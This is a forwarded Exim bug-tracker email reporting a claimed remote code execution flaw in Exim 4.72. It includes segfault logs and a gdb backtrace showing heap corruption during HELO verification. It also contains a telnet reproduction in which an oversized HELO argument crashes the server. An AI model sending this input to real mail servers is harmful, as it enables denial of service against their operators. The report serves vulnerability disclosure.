------- You are receiving this mail because: ------- You are on the CC list for the bug.
http://bugs.exim.org/show_bug.cgi?id=1580 Summary: 【remote exec vulnerability】 Product: Exim Version: 4.72 Platform: Other OS/Version: Windows Status: NEW Severity: security Priority: critical Component: Eximon AssignedTo: [email protected] ReportedBy: [email protected] CC: [email protected] Created an attachment (id=785) --> (http://bugs.exim.org/attachment.cgi?id=785) conf file this is a remote code exec vulnerability. crash report: Jan 29 00:55:13 localhost kernel: exim[25432]: segfault at 18 ip 00007fcb67c254fd sp 00007fff66f272b0 error 4 in libc-2.12.so[7fcb67bad000+18a000] Jan 29 00:58:45 localhost kernel: exim[25471]: segfault at 18 ip 00007feae99034fd sp 00007ffff8aefaf0 error 4 in libc-2.12.so[7feae988b000+18a000] if client do these , server will crash:: [root@localhost ~]# telnet 192.168.77.98 25 Trying 192.168.77.98... Connected to 192.168.77.98. Escape character is '^]'. 220 localhost.localdomain ESMTP Exim 4.72 Thu, 29 Jan 2015 01:01:15 +0800 127.0.0.1 500 unrecognized command helo 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Connection closed by foreign host. debug info: (gdb) bt #0 0x00007f840a11a625 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64 #1 0x00007f840a11be05 in abort () at abort.c:92 #2 0x00007f840a158537 in __libc_message (do_abort=2, fmt=0x7f840a240900 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:198 #3 0x00007f840a15de66 in malloc_printerr (action=3, str=0x7f840a240c00 "free(): invalid next size (normal)", ptr=<value optimized out>) at malloc.c:6336 #4 0x00007f840a1609b3 in _int_free (av=0x7f840a477e80, p=0x7f840de4d8b0, have_lock=0) at malloc.c:4832 #5 0x00007f840a14e4cd in _IO_new_fclose (fp=0x7f840de4d8c0) at iofclose.c:88 #6 0x00007f840ca37e7d in os_find_running_interfaces_linux () at os.c:148 #7 0x00007f840ca2f01d in host_find_interfaces () at host.c:834 #8 0x00007f840ca2f27b in host_scan_for_local_hosts (host=<value optimized out>, lastptr=0x7fff2d907110, removed=0x0) at host.c:1328 #9 0x00007f840ca2f821 in host_find_byname (host=0x7fff2d907160, ignore_target_hosts=0x0, flags=<value optimized out>, fully_qualified_name=0x0, local_host_check=1) at host.c:2109 #10 0x00007f840ca58120 in smtp_verify_helo () at smtp_in.c:2492 #11 0x00007f840ca5a8d4 in smtp_setup_msg () at smtp_in.c:2919 #12 0x00007f840ca05ade in handle_smtp_call () at daemon.c:506 #13 daemon_go () at daemon.c:1875 #14 0x00007f840ca192ac in main (argc=3, cargv=<value optimized out>) at exim.c:4262 -- Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email -- ## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
